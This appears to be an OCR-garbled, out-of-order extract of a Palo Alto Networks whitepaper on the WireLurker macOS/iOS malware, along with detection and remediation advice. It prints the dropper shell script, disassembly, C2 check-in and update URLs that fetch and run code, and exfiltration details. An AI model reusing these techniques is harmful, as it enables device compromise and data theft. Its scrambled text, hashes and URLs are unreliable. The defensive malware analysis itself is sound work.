28. der but can still view them through the Terminal Figure 7 cxiao PANM18JVFHOORAP Applications CleanApp app Contents MacOS zsh ontents MacOS zsh 14 cd MacOS Ls stat CleanApp 16777220 110655939 rwxr xr x 1 cxiao admin 31196 Sep 25 13 40 06 2014 May 16 00 16 53 20 14 Sep 25 13 40 06 2014 May 16 00 16 53 2014 4096 64 x80 CleanApp eoo L3 MacOS x Emam Lm 3 Lo L_e ji_a j a PN Contents L3 CodeSignature fads lications y etl D Frameworks 3 Documents ag aaa poan KS Pictures Pkginfo INE _ Resources cm J Desktop F Te pav AirDrop DEVICES FIGURE 7 WireLurker hidden files within an application bundle These operations trojanize the original application through repackaging After the bundle is trojanized the malicious loader is executed when the application is run The loader first drops an embedded script file to Users Shared run sh with the following content bin sh bin cp rf 2 bin cp rf 0 9 amp amp usr bin open a 9 sleep 5 bin cp rf 92 9 rm rf 7 92 chflags hidden chflags hidden _ rm f Users Shared run sh The text 96 is replaced by the full path to the application s bundle executable prior to being dropped This effectively backs up the loader restores the original bundle executable runs it restores the loader and deletes the script itself It also sets the hidden flag again for the lo
29. e background e WireLurker initialization and update scripts create and load launch daemons ensuring persistence after reboot e Some WireLurker executables also load launch daemons through invoking the launchctl command Figure 12 void _ cdecl CheckStatus int _CheckStatus proc near DATA XREF _main 5B o push rbp mov rbp rsp lea rdi aUsrLocalMachoo usr local machook watch sh call _system lea rdi aBinLaunchctlLo bin launchctl load wF Library Launch pop rbp jmp system _CheckStatus endp FIGURE 12 Sample code for WireLurker persistence through the use of launchctl Using these methods there will always be at least two processes running on a WireLurker infected OS X system one checking for updates and another for downloading IPA files and monitoring USB connections for iOS devices to infect PALO ALTO NETWORKS WireLurker Apple OS X and 10S malware 1 3 C2 Server Communication WireLurker frequently communicates with its C2 server To date only one C2 server has been used wwwl comeinbaby com 124 248 245 78 This server s key roles follow e Hosts code updates for download e Hosts IOS applications for download e Processes reports on WireLurker status e Accepts uploads of extiltrated Mac and iOS device information e Accepts uploads of extiltrated IOS user data As noted previously WireLurker versions A and B communicate with the C2 server in plaintext over HTTP WireLurker version C uses a custom
30. e demonstrated similar methods to attack non jailoroken devices before however this malware combines a number of techniques to successfully realize a new breed of threat to all iOS devices WireLurker exhibits complex code structure multiple component versions file hiding code obfuscation and customized encryption to thwart anti reversing In this whitepaper we explain how WireLurker is delivered the details of its malware progression and specifics on its operation We further describe WireLurker s potential impact methods to prevent detect contain and remediate the threat and Palo Alto Networks enterprise security platform protections in place to counter associated risk WireLurker is capable of stealing a variety of information from the mobile devices it infects and regularly requests updates from the attackers command and control server his malware is under active development and its creator s ultimate goal is not yet clear PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 3 Background User Reporting for this Threat Qu Chao a developer at Tencent initially observed WireLurker on June 1 2014 when he found highly suspicious files and processes on his Mac and iPhone Figure 1 ARK IOS RBRAHR EW Pr HRS HERE T 8 DU fE3 QuCh o ia June 1 2014 Se Lid FB Gn amp BUBGKEGAR iOS WERT TEX 5 Mac 82b Z I te S OLESUCE HE I RE RI SR XUR5H21BUXIS PPRFFIER TA REAREN 7 alttz 72
31. ebView webView shouldStartLoadWithRequest navigationType id v5 r4 1 char result regi void v7 r5 2 void v8 ree 2 v5 z a4 result z 1 if la5 v7 objc aae endi vs SU CLASS UlApplication sharedApplication v8 objc msgSend v5 URL objc msgSend v7 openURL v8 result return result FIGURE 25 Unfinished hooking code for loading URLs in the background Self Update Before hooking the sendEvent method sfbase dylib also connects with its C2 server to check for updates It checked in with the following URL furnishing its current version information and the Advertising ID ADID of the iOS device http wwwhL comeinbaby comy app getversion php v2 version amp adid ad id This HTTP request will return the newest version number as well as the download URL for that version Figure 26 shows a sample check in and its C2 server response eoo0 j www comeinbaby com ar X ten C www comeinbaby com app getversion php v 4002 amp adid whatever 7 result version 4 0 2 url http www comeinbaby com app v4002 sfbase dylib FIGURE 26 Sample check in request and C2 server response for sfbase dylib self update All of the sfbase dylib dynamic libraries we obtained from the original Maiyadi Mac samples were version 4 0 2 which is also the latest version hosted on the
32. iately after they were found WireLurker is now the only known active non jailbroken malware threat putting over 800 million iOS devices at risk PALO ALTO NETWORKS WireLurker Apple OS X and IOS malware 2 6 The use of enterprise provisioning to install applications on non jailbroken devices is not a new concept This technique has been widely abused by game fans and a number of Chinese application distribution platforms Since January 2013 there have been at least five Mac PC tools that have abused enterprise provisioning and the libimobiledevice library to install pirated applications on non jailbroken devices in China PP Helper PPBfIXE KuaiYong Helper FH BN 91 Mobile Helper 91 HLF KuaiZhuang JR and SouApple 3258 It is noteworthy that the PP Helper application is also downloaded and installed by WireLurker In September 2014 Tao Wei et al presented at Virus Bulletin on the risk of abusing Apple s enterprise distribution program According to their research any application can bypass Apple review arbitrarily invoke private iOS APIs monitor user behavior and exploit vulnerabilities in a non jailbroken iOS device by leveraging an enterprise provisioning profile WireLurker is a prime example of how this is no longer a theoretical risk but an active threat as seen in the wild Actor Motivation The ultimate goal of the WireLurker attacks is not completely clear The functionality and infrastructure allows
33. ions of code demonstrates progressive refinement e Version A neither downloads nor installs iOS applications to connected devices and communicated with the C2 server in the clear plaintext e Version B downloads and installs iOS applications but only for jailbroken devices it also communicated with its C2 server in the clear e Version C downloads and installs iOS applications for both jailbroken and non jailoroken devices and incorporated a custom encryption protocol for its C2 server communication Another significant difference between versions is found in associated malicious filenames paths and their content WireLurker consists of dozens of malicious files that can be grouped into the following categories Original malicious samples which were used to trojanize Mac applications e Dropped malicious executable files and configuration files e Downloaded update packages from the C2 server ocally generated database and log files e Downloaded IPA format iOS applications e Malicious IOS executable files e Malicious IOS dynamic library files FILES GROUP VERSION A TO B VERSION B TOC Original samples No changes No changes Dropped files Path and content changes Path and content changes Downloaded updates Unknown Downloaded a shell script with a packed executable file Generated files Path and filename changes Path and filename changes Downloaded IPAs Downloaded a game and a third Downloaded a normal app party
34. it pt pt PT nl sv nb da fi ru pl zh Hans zh Hant ko ar cs hu tr th ca hr el he ro sk uk en us Connection keep alive HTTP 1 1 382 Found Connection close Location http 125 39 68 200 fi1es 1124000004AEA39F www comeinbaby com mac update zip FIGURE 9 Packet capture of WireLurker version update communication with C2 server A sample C2 server response follows result version 71 url http www comeinbaby com mac update zip When the version field returns a non zero value WireLurker downloads the ZIP archive specified in the url field decompresses that archive to usr local machook update and executes the enclosed start sh script WireLurker version B uses a different C2 server request to check for updates http wwwhL comeinbaby com mac getsoft php In this version the HTTP response body contains plaintext for the start sh script to execute and the temporary folder from which it runs is set to tmp up When we began analysis of WireLurker its update package contained version C The start sh script for this version executed a newly added update binary which e Drops numerous new binary executable and plist files onto the system e Loads newly dropped plist files as launch daemons e g com apple MailServiceAgentHelper plist Deletes executable and plist files of previous versions e Unloads old launch daemons PALO ALTO NETWOR
35. ized encryption protocol Figure 13 oee O00 lc 42 5c ab 55 00 1c 42 00 68 18 88 Ge 45 oe 0180 08 ca le ca 88 08 BB 86 67 38 7c TB f5 4e Ba d3 nternet Protocol Version 4 Src 124 248 245 78 124 24B 24 0020 37 la 07 ez cB 13 24 4e 11 82 ch 69 79 68 58 18 rame 99 220 bytes on wire 1768 bits 228 bytes captured ransmission Control Protocol Src Port terminaldb 2018 9038 40 88 9b bf 88 O0 TEE 30 34 39 38 30 38 ata 162 bytes eo4Q 37 55 5 I 66 57 T7 4 69 63 33 4 Data 3134391391359039439935 6303509 755515a4d07 0665 5a4b4Tbo4a63 tn o e i AR i 7 3 I x Length 162 wes A as te Xt i rE E 72 T T 5 pene TEE 4c 6c 63 57 59 69 70 48 4b 77 65 8890 ah ee ee 62 6 bc 37 6 379 13 2b 0a 56 6 b3 4 55 4 6g Bb 75 de 5i JASE 7 68b E 43 Tl v F 52 38 45 66 c 50 g c t 35 36 B75 Ti bo 54 76 3 i 4b 4b 7 d 3 FIGURE 13 WireLurker version C customized encryption protocol for C2 communication Reverse engineering of this encryption protocol reveals the use of the Data Encryption Standard DES algorithm in Electronic Codebook ECB mode with Cryptographic Message Syntax Standard PKCS7 padding For each piece of TCP data it receives or sends the first 10 bytes of the data are used to generate a session key The session key is then combined with a fixed string dksyel to generate a decryption key Remaining bytes of the data are encrypted data that has also been encoded using Base64
36. l be installed and WireLurker will have successfully compromised that non jailoroken device Furthermore users are typically none the wiser since the application otherwise operates just like the legitimate version 19 10 100 H Profiles Provisioning com manhuaba manhuajb Received Sep 16 2014 Are You Sure You Want to Open the Expires Sep 16 2015 Application 2988 2 from the Developer iPhone Distribution Hunan Langxiong Advertising Decoration Engineering Co Ltd Continue Quit FIGURE 16 WireLurker iOS confirmation dialog and subsequent enterprise provisioning DAIA AITA NI TWADKC x VAT eA Toa een Aww AC Mo anA IAC 2s amp laksa rA L U AL U N E 1 WOR K 3 uz V VIiTreLurker App Le US A anc IUS Malwal USB Connection Monitoring WireLurker uses a popular library called libimobiledevice to interact with iOS devices through USB connections This third party open source software library implements the iTunes protocol stack for communication between a computer and iOS device II WireLurker registers a callback function usbcallback idevice event t const void through the idevice event subscribe function provided by libimobiledevice Figure 17 _startListen proc near CODE XREF _main 6F p push rbp mov rbp rsp push rbx push rax lea rdi _ Z11usbcallbackPK15idevice event tPv xor esi esi call idevice event subscribe test ax ax jz short loc 100005D15 add rsp 8 pop rbx pop rbp retn F
37. lication before installing it It accomplishes this by opening the IPA bundle as a ZIP archive parses the Info plist file in it to get its bundle executable filename adds an underscore to the executable filename and copies usr local machook start for version B or usr bin sttyb 11 pl for version C into the bundle as the original executable filename The start and the sttyb 11 pl files are very similar in terms of binary code and their functions are discussed in more depth in the WireLurker iOS malware analysis section Installation of Trojanized 10S Applications Finally WireLurker installs trojanized applications to connected iOS devices For a non jailoroken device it installs downloaded enterprise certificate signed applications to the device However if the device is jailbroken it trojanizes downloaded or backed up applications and then installs or reinstalls them to the device WireLurker performs each installation by uploading the trojanized IPA bundle to the iOS device through the AFC service and then leveraging the instproxy install interface of libimobiledevice Figure 23 PALO ALTO NETWORKS WireLurker Apple OS X and 10S malware 20 mov rax cs afc client mov rcx rbp var 38 mov rdi rax mov rsi ri4 mov rdx rcx call Z15afc upload fileP18afc client privatePKcS2 afc upload file test eax eax js loc 100005671 mov rax cs ipc mov rcx rbp var_38 lea r9 Z9status cbPKcP
38. mber ModelNumber xor esi esi call ZA3getdeviceinfoP24lockdownd client privatePKcS2 mov r15 rax mov rdi cs client lea rdx aProductversion ProductVersion xor esi esi call Z13getdeviceinfoP24lockdownd client privatePKcS2 mov rbx rax mov rbp var 88 rbx mov rdi cs client lea rdx aProducttype ProductType xor esi esi call Z13getdeviceinfoP24lockdownd client privatePKcS2 mov rbpevar 90 rax mov rdi cs client lea rsi aCom apple itun com apple itunesstored lea rdx aAppleid AppleID call Z13getdeviceinfoP24lockdownd client privatePKcS2 mov rbpevar 98 rax mov rdi cs client lea rdx aUniquedeviceid UniqueDeviceID xor esi esi call Z13getdeviceinfoP24lockdownd client privatePKcS2 mov rbpevar A0 rax mov rdi cs client lea rdx aWifiaddress WiFiAddress xor esi esi call Z13getdeviceinfoP24lockdownd client privatePKcS2 FIGURE 18 Code showing WireLurker collecting iOS device information All of the collected device information is concatenated into a string that is then sent to the C2 server Installation of Malicious Dynamic Library to an 10S Device After exfiltration of iOS device information WireLurker determines the jailbroken status of the device by attempting to connect to an IOS service named AFC2 com apple afc2 Figure 19 AFC2 is an additional AFC Apple File Connection or Apple File Conduit service that is part of jailbreaking utilitie
39. r WireLurker from our unified platform they can block this traffic by deploying a strict policy For host based detection Mac and IOS users should check processes and files on their Mac computers and IOS devices We wrote a Python script for OS X systems to detect known malicious and suspicious files as well as applications that exhibit characteristics of infection This script can be downloaded from the following URL httos github com PaloAltoNetworks BD WireLurkerDetector Both unified platform alerting blocking and the output of the Python script referenced above are meant to feed into incident response efforts Supporting containment towards remediation of this threat PALO ALTO NETWORKS WireLurker Apple OS X and 10S malware 28 Remediation If WireLurker is found on any OS X computer we recommend the deletion of respective files and removal of applications reported by the script As of the publication date of this report the iOS component of WireLurker is only spread through an infected Mac computer accordingly if WireLurker is found on a Mac we recommend inspection of all iOS devices that have connected with that computer A quick check for iOS devices includes determining whether any unauthorized enterprise provisioning profiles were created by navigating to Settings General gt Profile If an anomalous profile is found it should be removed and a subsequent check of all applications should be performed Delete any
40. rovisioning 15 We obtained a legal copy of the manhua application from the Apple iTunes App Store Its legitimate bundle identifier is com manhuaba manhua while the bundle identifier of the WireLurker version is com manhuaba manhuajb The jb reference is most likely an abbreviation of jailbreak Otherwise the primary difference between the official and WireLurker versions of this application are that the former doesn t contain an embedded mobileprovision file within its bundle The second difference is in the WireLurker binary code not having been encrypted by Apple Figure 15 file manhua manhua Mach Q universal binary with 3 architectures manhua for architecture armv Mach 0 executable arm manhua for architecture armv s Mach O executable arm manhua for architecture cputype 16777228 cpusubtype Mach 0 64 bit executable Lipo thin armv 7s manhua output manhua armv s otool l1 manhua armv s grep LC ENCRYPTION INFO A4 cmd cmdsize 20 cryptoff 16384 cryptsize 262144 cryptid 0 FIGURE 15 WireLurker applications are not encrypted by Apple The use of enterprise provisioning explains how these applications can be installed on non jailoroken iOS devices Yet on the first attempt to run a WireLurker application on IOS users are presented with a dialog requesting confirmation to open a third party application Figure 16 If the user chooses to continue a third party enterprise provisioning profile wil
41. s for IOS devices The daemon process of the AFC2 service runs with root permissions allowing the service to read write or modify any file on the iOS file system mov rdi cs client lea rsi aCom apple afc2 com apple afc2 lea rdx service call lockdownd start service test ax ax jnz short loc 1000036D7 mov rsi cs service cmp word ptr rsi jz short loc 1000036D7 mov cs 1 mov rdi cs device lea rdx afc client call afc client new FIGURE 19 Code for WireLurker testing whether an iOS device is jailbroken PALO ALTO NETWORKS WireLurker Apple OS X and IOS malware 18 If the AFC2 service exists on the device WireLurker installs usr local machook sfbase dylib for version B or etc manpath d libiodb dylib for version C to Library MobileSubstrate DynamicLibraries sfbase dylib on the device Figure 20 These two files contain identical content SHA 1 hash 461b51dd595c07f3c82be7cffc1cc77da6700605 and constitute an ARM based Mach O dynamic library that is a Cydia Substrate tweak This dynamic library is discussed in more detail in the WireLurker iOS malware analysis section of this whitepaper mov ropevar 306 mov rdi cs afc client lea rsi aLibraryMobiles Library MobileSubstrate DynamicLibrarie lea rdx rbpevar 30 call afc get file info test ax ax jz loc 100003A89 mov rdi cs afc client lea rsi aEtcManpath dli etc manpath d libiodb dylib lea rdx a
42. tions with WireLurker s Command and Control C2 server and checks whether an updated version of the daemon was available If so it downloads an updater package and runs an enclosed shell script to update itself Newer versions of WireLurker employ a launch daemon that downloads iOS applications signed with enterprise certificates and leverages custom encryption for C2 communication Yet another launch daemon is responsible for attacking iOS devices connected via USB It monitors USB connection events and upon detecting an iOS device ascertains its Jailbreak status This check is accomplished by trying to establish a connection with the AFC2 service on the device which if successful would indicate it was Jailbroken This daemon then sends a comprehensive enumeration of device information to the C2 server For a non jailoroken iOS device WireLurker simply installs iOS applications that it downloads leveraging iTunes protocols implemented by the libimobiledevice library For a jailbroken iOS device WireLurker backs up specific applications from the device to the Mac computer and trojanizes repackages both backed up and additional downloaded applications with a malicious binary file These altered iOS applications are then installed to the device through the same iTunes protocols noted above Additionally WireLurker uploads a malicious MobileSubstrate tweak file to the device through the AFC2 service At this point new application icons are visible
43. to the user on the connected IOS device whether jailbroken or not For a jailbroken device malicious code is injected into system applications querying all contact names phone numbers and Apple IDs and sending them to the C2 server along with WireLurker status information WireLurker Versions From April 30 2014 through October 17 2014 we observed three distinct versions of WireLurker The first version version A consisted of the original malicious files that were used to trojanize Mac applications on Maiyadi A week later on May 7 2014 the second version version B was distributed through WireLurker s C2 server The v parameter of a URL found in its code supports that this is indeed the second version from the attacker s point of view Figure 6 Then prior to August 2014 the C2 server began distributing the third version version C The content of this latest updating script confirmed it was the successor of version B PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 7 call Z23GetHardwareSerialNumberv GetHardwareSerialNumber void mov rax call _objc_retainAutoreleasedReturnValue mov ris rax mov rdi cs classRef_NSStrin mov rsi cs selRef stringWithFormat lea rdx cfstr HttpWww come 2 http www comeinbaby com getinsad snsXg amp udidsXs amp vz2 xor eax eax FIGURE 6 WireLurker version information embedded in a URL found in binary Examination of the differences between these three vers
44. utable Files Filename a0462626db593020682008a02ffe41219dbd804d 3113e0ca6466d20b0f2dcb1e85ac107d749f1080 89015456a79b185669294a706b5fc f3c572b83b 2c81d704088757e5112207284b9c5e443d14722a d0710ab8770c0ea5002d1cf90a33cdf7ff148b61 c ab02fdc35ded43538d629add42356689a51117 a3af7cf08900428142fe77d53f06fabae4bae9e5 cd29d821a8a84757d1c8eae4b6844f1a56bd1833 263b1ea0b1264b289c582fc4c3f3a6176293c47b 461b51dd595c0713c82be7cffc1cc77da6700605 Not available sfbase dylib libiodb dylib sfbase dylib 4 0 0 0 sfbase dylib 4 0 0 1 start stty5 11 pl URLs for C2 Communication 461b51dd595c0713c82be7cffc1cc77da6700605 f097eb7af4ea7783713adf01e5483b0d89375be8 2a40a5e0b3502641951858e291678c290e4a18c4 0134bb87585a448caafe51218746e07013b 17272 269b1ea0b1264b289c582fc4c3f3a6176293c47b The following are the HTTP URLs WireLurker used for C2 communication and their respective purpose Data Context http wwwL comeinbaby com mac getversion php http wwwl comeinbaby com mac saveinfo php http wwwL comeinbaby com mac getsoft php http wwwL comeinbaby com mac getipa2 php http wwwL comeinbaby com app getversion php http wwwL comeinbaby com app saveinfo php http wwwL comeinbaby com app app php http wwwl comeinbaby com getinsad http wwwl comeinbaby com mac_log http wwwL comeinbaby com insad_log http wwwl comeinbaby com start_log http wwwL comeinbaby com updateerror http wwwl comeinbaby com update_log
45. vS1 status cb char const void void xor edx edx xor r8d r8d mov rdi rax mov rsi rcx mov rcx r9 call tal mov rax rbp var 38 mov rdi rax void FIGURE 23 WireLurker installation of trojanized iOS applications PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 2 1 Analysis of WireLurker i05 Malware WireLurker uploads a malicious dynamic library sfbase dylib to an IOS device and repackages a malicious executable file start into IOS application bundles that it installs This section describes how these two files operate Code Injection into System Applications The sfbase dylib dynamic library acts as a Cydia MobileSubstrate tweak The MobileSubstrate framework loads this dynamic library into all jailoroken iOS applications however this tweak focuses on the Phone Messages Safari Storage Mounter search and Preferences system applications On initialization it hooks the UlWindow s sendEvent method by invoking the MSHookMessageEx API Figure 24 v8 objc msgSend amp OBJC CLASS A NSAutoreleasePool alloc v18 objc msgSend v8 init ti Ei INI RT mainBundle objc msgSend vi infoDictionary objc msgSend v2 objectForKey CFSTR CFBundleExecutable objc msgSend amp OBJC CLASS NSArray alloc objc msgSend v4 initWithObjects hha Mauri priet ii CFSTR MobileSMS CFSTR MobileSafari CFSTR MobileStorageMounter CFSTR Search CFSTR EX
46. way Copyright 2014 Palo Alto Networks Inc All rights reserved Palo Alto Networks the Palo Alto Networks Logo PAN OS App ID and Panorama are trademarks of Palo Alto Networks Inc All specifications are subject to change without notice Palo Alto Networks assumes no responsibility for any inaccuracies in this document or for any obligation to update information in this document Palo Alto Networks reserves the right to change modify transfer or otherwise revise this publication without notice PAN WP U42 WL 0110514
Download Pdf Manuals
Related Search